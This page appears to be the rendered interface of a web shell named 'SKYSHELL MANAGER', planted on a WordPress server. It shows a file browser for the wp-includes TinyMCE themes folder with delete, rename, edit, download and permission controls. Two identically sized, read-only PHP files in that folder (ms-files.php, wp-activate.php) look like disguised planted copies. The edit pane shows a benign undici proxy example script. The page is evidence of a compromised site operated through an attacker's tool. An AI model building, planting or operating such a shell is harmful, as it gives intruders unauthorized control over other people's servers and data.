📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: proxy-agent.js
'use strict' const { request, setGlobalDispatcher, ProxyAgent } = require('../') setGlobalDispatcher(new ProxyAgent('http://localhost:8000/')) async function main () { const { statusCode, headers, trailers, body // send the request via the http://localhost:8000/ HTTP proxy } = await request('http://localhost:3000/undici') console.log('response received', statusCode) console.log('headers', headers) for await (const data of body) { console.log('data', data) } console.log('trailers', trailers) } main()
Save